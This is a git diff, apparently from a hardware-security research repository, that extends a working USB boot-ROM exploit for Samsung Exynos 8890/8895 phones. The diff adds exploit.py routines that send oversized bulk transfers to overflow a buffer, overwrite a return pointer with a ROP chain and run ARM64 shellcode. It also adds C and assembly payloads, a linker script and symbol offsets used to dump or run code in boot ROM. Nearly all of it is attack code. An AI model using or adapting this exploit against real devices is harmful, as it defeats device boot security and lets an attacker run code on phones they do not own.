diff --git a/Makefile b/Makefile new file mode 100644 index 0000000..28d2fe1 --- /dev/null +++ b/Makefile @@ -0,0 +1,17 @@ +ifeq ($(ANDROID_NDK_ROOT),) +$(error Error : Set the env variable 'ANDROID_NDK_ROOT' with the path of the Android NDK (version 20)) +endif + +CC := $(ANDROID_NDK_ROOT)/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android27-clang +AR := $(ANDROID_NDK_ROOT)/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android-ar +OBJCOPY := $(ANDROID_NDK_ROOT)/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android-objcopy +LD := $(ANDROID_NDK_ROOT)/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android-ld.bfd + +#==================Target Samsung S7 (8890)================== +CFLAGS_SAMSUNGS7 = -Os + +dwc3: + $(CC) entry.S -c -o entry.o $(CFLAGS_SAMSUNGS7) + $(CC) $(CFLAGS_SAMSUNGS7) -c test_dwc3.c -o dwc3.o + $(LD) -T test_dwc3.ld entry.o dwc3.o -o dwc3.elf --just-symbols=symbols.txt + $(OBJCOPY) -O binary dwc3.elf dwc3.bin diff --git a/dwc3.bin b/dwc3.bin new file mode 100755 index 0000000..e800078 Binary files /dev/null and b/dwc3.bin differ diff --git a/dwc3.elf b/dwc3.elf new file mode 100755 index 0000000..61b2b6f Binary files /dev/null and b/dwc3.elf differ diff --git a/dwc3.o b/dwc3.o new file mode 100644 index 0000000..aff8e12 Binary files /dev/null and b/dwc3.o differ diff --git a/entry.S b/entry.S new file mode 100644 index 0000000..5dea2d7 --- /dev/null +++ b/entry.S @@ -0,0 +1,2 @@ +start: + b main \ No newline at end of file diff --git a/entry.o b/entry.o new file mode 100644 index 0000000..0c578ca Binary files /dev/null and b/entry.o differ diff --git a/exploit.py b/exploit.py index 65adbf7..0275fd9 100644 --- a/exploit.py +++ b/exploit.py @@ -1,6 +1,8 @@ import usb.core import usb.util -import struct, sys, usb1, libusb1, ctypes +import struct, sys, usb1, libusb1, ctypes, usb +from keystone import * +from capstone import * # from ghidra_assistant.utils.utils import * def p32(x): @@ -27,7 +29,7 @@ BOOTROM_SIZE = 0x20000 #128Kb TARGET_OFFSETS = { # XFER_BUFFER, RA_PTR, XFER_END_SIZE - "8890": (0x02021800, 0x02020F08, 0x02070000), + "8890": (0x02021800, 0x02020F08, 0x02070000), "8895": (0x02021800, 0x02020F18, 0x02070000) } @@ -72,6 +74,26 @@ class ExynosDevice(): res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, 0, 0, ctypes.byref(transferred), 0) assert(res == 0) return transfered + + def test_bug_2(self): + # Also bug here + # payload = p32(1) + p32(CHUNK_SIZE + 0x2001) + b"\x00" * MAX_PAYLOAD_SIZE + p16(0) + # self.write(payload, MAX_PAYLOAD_SIZE) + # self.write(b"\xaa" * CHUNK_SIZE, CHUNK_SIZE) + + transferred = ctypes.c_int() + bug_payload = p32(0) + p32(MAX_PAYLOAD_SIZE + 0x100) + b"\x00" * MAX_PAYLOAD_SIZE + p16(0) + bug_payload += b"\xcc" * (BLOCK_SIZE - len(bug_payload)) + res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, bug_payload, len(bug_payload), ctypes.byref(transferred), 0) + assert res == 0 + + payload = b"\xaa" * 0x200 + res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 0) + assert res == 0 + + payload = b"\xaa" * (0x401 - (MAX_PAYLOAD_SIZE - 0x200)) + res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 0) + pass def test_bug(self): # Start by sending a valid packet @@ -109,11 +131,6 @@ class ExynosDevice(): assert transferred.value == len(bug_payload), "Invalid transfered size" current_offset += len(bug_payload) - 8 # Remove header - # Send the actual payload - # res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 0) - # assert res == 0, "Error sending payload" - # current_offset += len(payload) - cnt = 0 while True: if current_offset + CHUNK_SIZE >= TARGET_OFFSETS[self.target][1] and current_offset < TARGET_OFFSETS[self.target][1]: @@ -138,18 +155,129 @@ class ExynosDevice(): rop_chain = (b"\x00" * (ram_size - 6)) + p64(TARGET_OFFSETS[self.target][0]) + (b"\x00" * 2) transferred = ctypes.c_int(0) res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, rop_chain, len(rop_chain), ctypes.byref(transferred), 0) - # assert transferred.value == len(rop_chain), "Error sending ROP chain" + assert res == 0, "Error sending ROP chain" - buf = ctypes.c_buffer(b"", 0x200000) - res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_IN, buf, len(buf), ctypes.byref(transferred), 1000) + # Send some data + p = b"\xaa" * 0x200 + transferred.value = 0 + res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, p, len(p), ctypes.byref(transferred), 100) + buf = ctypes.c_buffer(b"", 0x20000) + res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, 0x81, buf, len(buf), ctypes.byref(transferred), 100) + # Should have received some bytes pass +ks = Ks(KS_ARCH_ARM64, KS_MODE_LITTLE_ENDIAN) +def usb_debug(): + shellcode = f""" + start: + adr x0, test_fun + ldr x0, [x0] + blr x0 + + mov w1, #0x20000 // size + mov w0, #0x0 // address + bl usb_send + mov x0, #0 + br x0 //reset + + #Setup read usb + mov w0, #0x2 + adr x1, shellcode_base + ldr x1, [x1] + mov w2, #0x02020000 + add w2, w2, #0x2000 + # endpoint, cb, buffer + adr x5, maybe_usb_setup_read + ldr x5, [x5] + blr x5 + + + # Get something?? arg0 is endpoint + mov w0, #0x2 + adr x1, maybe_read_size_endpoint + ldr x1, [x1] + blr x1 + + + # # Send some data from ROM + # mov w1, #0x200 // size + # mov w0, #0x0 // address + # bl usb_send + # mov x0, #0 + # br x0 //reset + + + # # dwc3_ep0_start_trans + # mov w1, w0 + # mov w0, #0x2 + # mov w2, #0x200 + # adr x5, dwc3_ep0_start_trans + # ldr x5, [x5] + # blr x5 + + # # Send some data from ROM + # mov w1, #0x200 // size + # mov w0, #0x0 // address + # bl usb_send + # mov x0, #0 + # br x0 //reset + + usb_send: + stp x29, x30, [sp,#-48]! + mov w3, #0x0 + bfxil w3, w1, #0, #24 + mov w1, #0xc12 + mov x29, sp + stp x19, x20, [sp,#16] + mov x5, #0xc834 + mov w20, #0x1 + movk x5, #0x1540, lsl #16 + ldr x2, [x29,#40] + mov x4, #0xc838 + orr w6, w1, w20 + movk x4, #0x1540, lsl #16 + mov x19, #0xc83c + movk x19, #0x1540, lsl #16 + stp w3, w1, [x2,#8] + mov w3, #0x406 + stp w0, wzr, [x2] + mov w0, w20 + ldr x1, [x29,#40] + strb w6, [x2,#12] + mov x2, #0x27c8 + str w1, [x5] + mov w1, #0x1388 + str wzr, [x4] + str w3, [x19] + blr x2 + mov w0, w20 + ldr w1, [x19] + ldp x19, x20, [sp,#16] + ldp x29, x30, [sp],#48 + ret + + usb_read_endpoint: .quad 0x00006654 + maybe_usb_setup_read: .quad 0x00006f88 + shellcode_base: .quad 0x02021800 + maybe_read_size_endpoint: .quad 0x00007a7c + dwc3_ep0_start_trans: .quad 0x0000791c + test_fun: .quad 0x000064e0 +""" + shellcode = ks.asm(shellcode, as_bytes=True)[0] + + shellcode = open("dwc3.bin", "rb").read() + + exynos = ExynosDevice() + exynos.exploit(shellcode) if __name__ == "__main__": + usb_debug() + sys.exit(0) # wait_for_device() exynos = ExynosDevice() + exynos.test_bug_2() path = "dump/exynos-usbdl/payloads/Exynos8890_dump_bootrom.bin" # path = "/home/eljakim/Source/gupje/source/bin/samsung_s7/debugger.bin" exynos.exploit(open(path, "rb").read()) diff --git a/symbols.txt b/symbols.txt new file mode 100644 index 0000000..ce55876 --- /dev/null +++ b/symbols.txt @@ -0,0 +1,5 @@ +maybe_usb_setup_read = 0x00006f88; +dwc3_ep0_start_trans = 0x0000791c; +usb_event_handler = 0x00007bac; +get_endpoint_buffer = 0x00007a7c; +sleep = 0x000027c8; \ No newline at end of file diff --git a/test_dwc3.c b/test_dwc3.c new file mode 100644 index 0000000..eb14a87 --- /dev/null +++ b/test_dwc3.c @@ -0,0 +1,57 @@ +#include + +// Create external function at 0x00006f88 +extern void maybe_usb_setup_read(char endpoint,void *fun,uint32_t target_buffer); +extern void dwc3_ep0_start_trans(char endpoint,uint32_t target_buf, uint32_t len); +extern int usb_event_handler(void); +extern void * get_endpoint_buffer(char endpoint); +extern void sleep(int endpoint,uint32_t timeout); + +#define recv_buffer 0x02021800 + 0x2000 +#define data_received 0x02021800 + 0x2004 + +// do { +// /* loops until image has been received */ +// usb_event_handler(); +// iVar2 = download_ready?(); #TODO, set some global to indicate readyness +// } while (iVar2 == 0); + +void recv_data_cb(uint32_t endpoint, uint32_t len){ + void *rbuf; + void *dest_buf = (void *)recv_buffer; + volatile void *dref = (void *)data_received; + + for(int i= 0; i < len; i++){ + rbuf = get_endpoint_buffer(2); + *(char *)dest_buf = *(char *)(void *)((int)rbuf + i); + } + // while(1){} + // asm("mov x0, #0x0"); + // asm("br x0"); + *(uint8_t *)dref = 3; +} + +void recv_data(){ + // Set data_received to 0 + // uint32_t *r = (uint32_t *) data_received; + // r = 0; + volatile void *dref = (void *)data_received; + *(uint8_t *)dref = 0; + + maybe_usb_setup_read(2, recv_data_cb, 1); + while(1){ + usb_event_handler(); + if(*(uint8_t *)dref == 3){ + break; + } + sleep(1, 10); + } +} + +int main() { + recv_data(); + // recv_data(); + // sleep(1, 5000); + asm("mov x0, #0x0"); + asm("br x0"); +} diff --git a/test_dwc3.ld b/test_dwc3.ld new file mode 100644 index 0000000..d2991ee --- /dev/null +++ b/test_dwc3.ld @@ -0,0 +1,14 @@ +MEMORY { + ROM (rwx): ORIGIN = 0x02021800, LENGTH = 0x1000 +} + +SECTIONS +{ + . = 0x02021800; + .text . : { + *(.text*) + *(.data*) + *(.rodata*) + } >ROM + +} \ No newline at end of file